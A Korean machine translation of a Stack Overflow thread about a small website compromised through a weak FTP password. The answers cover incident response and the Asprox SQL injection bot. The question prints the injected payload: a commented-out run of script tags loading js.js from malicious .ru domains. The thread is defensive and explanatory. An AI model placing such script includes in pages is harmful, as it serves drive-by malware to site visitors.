홈페이지가 해킹당했습니다..어떻게 해야 하나요?[닫은]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russian문제
오늘 아버지가 저에게 전화를 해서 자신의 웹사이트를 방문하는 사람들이 컴퓨터에 다운로드하려고 하면 168종의 바이러스가 감염된다고 말씀하셨습니다.그는 전혀 기술적이지 않으며 WYSIWYG 편집기를 사용하여 모든 것을 구축했습니다.
나는 그의 사이트를 열어서 소스를 살펴보았는데 소스 하단의 닫는 HTML 태그 바로 앞에 Javascript 포함 줄이 있었습니다.그들은 다음 파일을 포함했습니다(다른 많은 파일 중에서): http://www.98hs.ru/js.js <-- 해당 URL로 이동하기 전에 JAVASCRIPT를 끄십시오.
그래서 지금은 댓글을 달았습니다.그의 FTP 비밀번호는 6글자 길이의 일반 사전 단어인 것으로 밝혀졌으므로 이것이 해킹된 방법이라고 생각됩니다.우리는 그의 비밀번호를 8자리 이상의 단어가 아닌 문자열로 변경했습니다(그는 헌트앤펙 타이퍼이기 때문에 비밀번호 문구를 사용하지 않을 것입니다).
나는 한 98hs.ru의 whois 칠레의 서버에서 호스팅된다는 사실을 발견했습니다.실제로 관련된 이메일 주소도 있는데, 이 사람이 범인인지 심각하게 의심스럽습니다.아마도 해킹당한 다른 사이트일 수도 있습니다.
하지만 나는 이전에 이런 종류의 일을 처리해 본 적이 없기 때문에 이 시점에서 무엇을 해야 할지 모르겠습니다.누구든지 어떤 제안이 있나요?
그는 webhost4life.com을 통해 일반 제인 보안되지 않은 FTP를 사용하고 있었습니다.난 방법조차 보이지 않아 하다 해당 사이트의 sftp.그 사람의 사용자 이름과 비밀번호가 도용된 것 같은데요?
그렇다면 이를 커뮤니티와 더욱 관련되게 만들기 위해 웹사이트가 해킹당하지 않도록 보호하기 위해 취해야 할 조치와 따라야 할 모범 사례는 무엇입니까?
기록을 위해 여기에 "마법처럼" 그의 파일에 추가된 코드 줄이 있습니다. (그리고 그의 컴퓨터에 있는 파일에는 없습니다. 아무 것도 하지 않을 것이라는 점을 확실히 하기 위해 주석 처리했습니다. 이 페이지에서는 Jeff가 이에 대해 경계할 것이라고 확신하지만):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
해결책
최대한 많은 정보를 수집하고 노력하세요.호스트가 귀하의 계정에 이루어진 모든 FTP 연결을 보여주는 로그를 제공할 수 있는지 확인하십시오.이를 사용하여 변경을 수행하고 IP 주소를 얻는 데 사용된 것이 FTP 연결인지 확인할 수 있습니다.
Wordpress, Drupal 또는 코딩하지 않은 다른 소프트웨어와 같이 미리 포장된 소프트웨어를 사용하는 경우 이러한 종류의 수정을 허용하는 업로드 코드에 취약점이 있을 수 있습니다.맞춤 제작된 경우 사용자가 파일을 업로드하거나 기존 파일을 수정할 수 있도록 허용한 위치를 다시 확인하세요.
두 번째는 사이트를 있는 그대로 덤프하고 다른 수정 사항이 있는지 모든 것을 확인하는 것입니다.그것은 단지 하나의 수정일 수도 있지만, FTP를 통해 접속했다면 거기에 무엇이 더 있는지 누가 알겠습니까?
사이트를 알려진 양호한 상태로 되돌리고 필요한 경우 최신 버전으로 업그레이드하세요.
고려해야 할 수익 수준도 있습니다.그 사람을 추적하려고 노력할 가치가 있는 피해입니까, 아니면 그냥 살면서 더 강력한 암호를 배우고 사용하는 것입니까?
다른 팁
나는 이것이 게임에서 조금 늦었다는 것을 알고 있지만 JavaScript에 대해 언급된 URL은 6월에 시작된 ASPRox 봇 부활의 일부로 알려진 사이트 목록에 언급되어 있습니다(적어도 그때 우리는 그것).이에 대한 몇 가지 세부 사항은 다음과 같습니다.
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
이것에 대한 불쾌한 점은 사실상 데이터베이스의 모든 varchar 유형 필드가 "감염"되어 이 URL에 대한 참조를 뱉어낸다는 것입니다. 이 URL에서 브라우저는 이를 봇으로 바꾸는 작은 iframe을 얻습니다.이에 대한 기본 SQL 수정 사항은 여기에서 찾을 수 있습니다.
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
하지만 무서운 점은 바이러스가 시스템 테이블에서 감염될 값을 찾고 있으며 많은 공유 호스팅 계획도 클라이언트를 위한 데이터베이스 공간을 공유한다는 것입니다.따라서 감염된 것은 아버지의 사이트가 아니라 잘못된 코드를 작성하여 SQL 주입 공격의 문을 연 아버지의 호스팅 클러스터 내의 다른 사람의 사이트일 가능성이 높습니다.
그가 아직 그렇게 하지 않았다면 나는 그들의 호스트에게 긴급 이메일을 보내고 전체 시스템을 고칠 수 있는 SQL 코드에 대한 링크를 줄 것입니다.영향을 받은 데이터베이스 테이블을 직접 수정할 수 있지만 감염을 수행하는 봇이 해당 구멍을 다시 통과하여 전체를 감염시킬 가능성이 높습니다.
이를 통해 작업할 수 있는 추가 정보를 얻을 수 있기를 바랍니다.
편집하다:한 가지 더 빠르게 생각해 보면, 그가 웹 사이트를 구축하기 위해 호스트 온라인 디자인 도구 중 하나를 사용하고 있다면 해당 콘텐츠가 모두 한 열에 존재하고 그런 식으로 감염되었을 것입니다.
아버지가 웹사이트 게시 도구를 사용하고 계셨다고 말씀하셨는데요.
게시 도구가 사용자의 컴퓨터에서 서버로 게시하는 경우 로컬 파일이 깨끗하여 서버에 다시 게시하기만 하면 되는 경우가 있습니다.
하지만 그는 자신의 서버에 일반 FTP와 다른 로그인 방법이 있는지 확인해야 합니다...이는 그의 비밀번호를 인터넷을 통해 일반 텍스트로 보내기 때문에 매우 안전하지 않습니다.
6단어 비밀번호를 사용하면 무차별 대입 공격을 받았을 수도 있습니다.그것은 그의 FTP가 가로채는 것보다 더 가능성이 높지만 그럴 수도 있습니다.
더 강력한 비밀번호로 시작하세요.(8자는 아직 상당히 약함)
이 링크가 인터넷에 연결되어 있는지 확인하세요. 보안 블로그 도움이됩니다.
사이트가 단순한 정적 HTML인가요?즉.그는 운전하는 사람이 손상된 스크립트/페이지를 업로드하도록 허용하는 업로드 페이지를 직접 코딩하지 못했습니까?
webhost4life에 사용 가능한 FTP 로그가 있는지 물어보고 문제를 보고해 보세요.당신은 결코 알지 못할 것입니다. 그들은 매우 수용적이고 정확히 무슨 일이 일어 났는지 알아낼 수 있습니까?
저는 공유 호스팅 업체에서 일하고 있으며 우리는 항상 이와 같은 보고를 환영하며 일반적으로 공격 기반의 정확한 벡터를 찾아내고 고객이 어디에서 잘못되었는지 조언할 수 있습니다.
종료 스크립트를 방지하려면 종료하지 않고 웹 서버를 분리하세요.다른 컴퓨터를 데이터 드라이브로 활용해 하드디스크를 분석하고, 로그 파일과 그 성격의 것들을 통해 범인을 파악할 수 있는지 확인해보세요.코드가 안전한지 확인한 다음 백업에서 복원하세요.
최근 ipower에서 호스팅되는 내 고객에게 이런 일이 일어났습니다.귀하의 호스팅 환경이 Apache 기반인지는 확실하지 않지만, 특히 웹 루트 위와 이미지 디렉터리 내부에서 생성하지 않은 .htaccess 파일을 다시 확인해야 한다면 거기에 약간의 불쾌감을 주는 경향이 있기 때문입니다. 또한 (그들은 추천에서 어디에서 왔는지에 따라 사람들을 리디렉션하고 있었습니다).또한 작성하지 않은 코드에 대해 생성한 코드도 확인하세요.
우리는 분명히 같은 사람들로부터 해킹당했습니다!아니면 우리의 경우에는 봇입니다.그들은 더 이상 아무도 관리하지 않는 일부 오래된 클래식 ASP 사이트의 URL에 SQL 주입을 사용했습니다.공격하는 IP를 찾아 IIS에서 차단했습니다.이제 우리는 모든 오래된 ASP를 리팩터링해야 합니다.따라서 내 조언은 먼저 IIS 로그를 살펴보고 사이트의 코드나 서버 구성에 문제가 있는지 알아보는 것입니다.
